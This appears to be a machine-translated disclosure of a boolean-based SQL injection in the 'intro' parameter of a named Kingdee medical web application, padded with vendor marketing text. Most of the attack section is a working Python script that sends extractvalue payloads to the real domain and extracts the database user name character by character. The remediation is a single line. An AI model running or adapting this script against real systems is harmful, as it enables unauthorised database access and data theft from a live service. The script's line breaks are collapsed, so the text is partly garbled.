SQL injection vulnerability in a Kingdee system (with verification script)

SQL injection vulnerability in a Kingdee system (with verification script)

Kingdee system Injection Vulnerability

As of November 8, 2015, the system had released more than 1.3 million mobile Internet users, with over 2.62 million transactions.

Kingdee medical was the first "mobile Internet Hospital" in China in May 30, 2014 and won two special reports on CCTV and news broadcast, with the most advanced product implementation method, the safest deployment mode, the most extensive experience in whole process optimization, the most professional media promotion and operation promotion, and the most extreme user experience, as of January November 8, 2015, the number of released mobile Internet hospital users exceeds 1.3 million, and the number of transactions exceeds 2.62 million. It is the leading and absolute leader of mobile Internet Hospital and has an incomparable absolute advantage.
 

Http://yiliao.kingdee.com/inform.php? Action = add & companyname = e & intro = 1 & email = [email protected] & name = 1 & position = 1 & tel = 1 the intro parameter has the BOOL injection vulnerability.> 
#coding=utf-8import sys,urllib2from optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllibresult=''def request(URL,data):    #print URL    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }    req = urllib2.Request(URL, data, user_agent)    try:        request = urllib2.urlopen(req)    except HTTPError, e:        if e.code == 500:            return 'Runtime Error'    except URLError, e:        #print('[!] We failed to reach a server.')        #print('[!] Reason: ' + str(e.reason))        sys.exit(1)    return request.read()def binary_sqli(left, right, index):   global result   while 1:        mid = (left + right)/2        if (right-left==1):            result += chr(right)            print 'user: ' ,result            break        payload = "1'%%2bextractvalue(1,if(ascii(mid(user(),%s,1)) not between 0 and %s,1,0x22))%%2b'" % (index, mid)        #print payload       # payload=""        html = request('http://yiliao.kingdee.com/inform.php?action=add&companyname=e&email=[email protected]&name=1&position=1&tel=1&intro='+payload,None)        #print html        verify = 'Error'        if verify  not in html:            left = mid        else:            right = midif __name__ == '__main__':    for i in range(1,27):        binary_sqli(32, 127, i)
 

 
Solution:
Filter parameters.